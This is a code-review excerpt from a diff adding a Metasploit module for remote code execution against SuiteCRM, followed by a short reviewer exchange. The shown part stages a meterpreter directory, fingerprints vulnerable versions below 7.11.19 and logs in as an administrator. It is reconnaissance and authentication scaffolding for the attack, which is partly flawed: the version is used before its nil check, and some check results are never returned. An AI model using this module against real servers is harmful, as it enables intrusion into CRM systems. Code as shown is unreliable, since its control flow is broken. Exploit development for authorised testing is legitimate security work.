modules/exploits/linux/http/suitecrm_log_file_rce.rb

```diff
@@ -0,0 +1,319 @@
+        OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),
+        OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])
+      ], self.class
+    )
+  end
+
+  def check
+    authenticate
+    version_check = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'cookie' => @cookie,
+        'vars_get' => {
+          'module' => 'Home',
+          'action' => 'About'
+        }
+      }
+    )
+
+    unless version_check
+      vprint_error("#{peer} - Connection timed out")
+      Exploit::CheckCode::Unknown
+    end
+
+    version = version_check.body[/Version 7.11.\d{1,2}/]
+    version_number = Integer(version.split('.').last)
+
+    if version.nil? || version.empty?
+      vprint_error('Could not determine version.')
+      about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"
+      print_status("Check #{about_url} to confirm version.")
+      Exploit::CheckCode::Unknown
+    end
+
+    print_status("SuiteCRM Version #{version}")
+
+    if version_number < 19
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def authenticate
+    print_status("Authenticating as #{datastore['USER']}")
+    initial_req = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'vars_get' => {
+          'module' => 'Users',
+          'action' => 'Login'
+        }
+      }
+    )
+
+    login = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'cookie' => initial_req.get_cookies,
+        'vars_post' => {
+          'module' => 'Users',
+          'action' => 'Authenticate',
+          'return_module' => 'Users',
+          'return_action' => 'Login',
+          'user_name' => datastore['USER'],
+          'username_password' => datastore['PASS'],
+          'Login' => 'Log In'
+        }
+      }
+    )
+
+    @cookie = login.get_cookies
+
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'cookie' => @cookie,
+        'vars_get' => {
+          'module' => 'Administration',
+          'action' => 'index'
+        }
+      }
+    )
+
+    auth_succeeded?(res)
+  end
+
+  def auth_succeeded?(res)
+    fail_with(Failure::NoAccess, 'No Response.') unless res
+
+    if res.code == 200
+      print_good("Authenticated as: #{datastore['USER']}")
+      if res.body.include?('Unauthorized access to administration.')
+        print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.")
+        @is_admin = false
+      else
+        print_good("#{datastore['USER']} has administrative rights.")
+        @is_admin = true
+      end
+      true
```

Comment:
Placing a `true` statement here won't return `true` for the method.

Reply:
Removed, Thanks!